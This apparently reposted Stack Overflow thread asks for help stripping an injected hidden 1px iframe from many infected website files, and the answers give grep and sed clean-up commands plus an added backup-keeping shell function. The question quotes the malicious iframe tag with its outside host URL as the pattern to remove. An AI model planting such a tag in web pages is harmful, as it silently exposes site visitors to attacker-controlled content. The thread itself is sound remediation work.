Looking for script to delete iframe malware from linux server

Posted by 末鹿安然 on 2019-12-24 10:56:04

Question


I'm looking for a script to delete the following iframe malware from my linux server:

    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>

It has infected hundreds of files on my server on different websites. I tried

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'

but it just outputs:

    sed: -e expression #1, char 49: unknown option to `s'

Appreciate your help :)

Cheers Dee


Answer 1:


Unescape the backslashes from the url in the sed regex.




Answer 2:


This should be a more generic solution. Effectively, what the malware does is look for the </body> and inject the iframe just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>.

    # grep recursively for text
    # escape all spaces in file names (\\ so sed emits a literal backslash)
    # global search and replace with just body tag;
    # [^>]* keeps the match inside one tag instead of a greedy .*
    grep -Rl "</iframe></body>" * | sed 's/ /\\ /g' | xargs sed -i 's/<iframe [^>]*><\/iframe><\/body>/<\/body>/g'

I found this other question on renaming the malware files also useful for quickly taking down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked.
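
The clean-up from the thread as a shell function (an added example, not code from the original question or answers): it uses `|` as the sed delimiter so the `/` characters in the URL cannot end the `s` command, passes file names NUL-terminated, and keeps a backup of every changed file. The function names and the `.infected-bak` suffix are assumptions, and the sample pages are constructed.

```shell
#!/bin/sh
# Added example, not from the original thread. HOST is the host quoted in the
# question; the function names and the .infected-bak suffix are assumptions.
HOST='ishigo.sytes.net'

clean_iframes() {
    dir=$1
    # Escape the dots so they match literally inside the regex.
    host_re=$(printf '%s' "$HOST" | sed 's/\./\\./g')
    # grep -F searches for the fixed string; -Z with xargs -0 passes file
    # names NUL-terminated, so names containing spaces need no escaping.
    # --exclude keeps a second run from touching the backups.
    # '|' is the s-command delimiter, so the '/' characters in the URL and
    # in </iframe> cannot end the pattern early (the "unknown option to
    # `s'" error). [^>]* and [^"]* confine the match to this one tag.
    grep -rlZF --exclude='*.infected-bak' -- "$HOST" "$dir" |
        xargs -0 -r sed -i.infected-bak \
            "s|<iframe [^>]*src=\"http://${host_re}/[^\"]*\"[^>]*></iframe>||g"
}

# Constructed sample: one infected page (file name with a space) that also
# holds a legitimate iframe, and one clean page that must stay untouched.
make_sample() {
    d=$(mktemp -d) || return 1
    bad='<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>'
    printf '<body><iframe src="/map.html"></iframe><p>hi</p>%s</body>\n' \
        "$bad" > "$d/my page.html"
    printf '<body><p>clean</p></body>\n' > "$d/ok.html"
    printf '%s\n' "$d"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample) && clean_iframes "$d" && cat "$d/my page.html"
fi
```

The backups still contain the injected tag, so keep them out of the web root or delete them once the cleaned files have been checked.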



Source: https://stackoverflow.com/questions/16547315/looking-for-script-to-delete-iframe-malware-from-linux-server
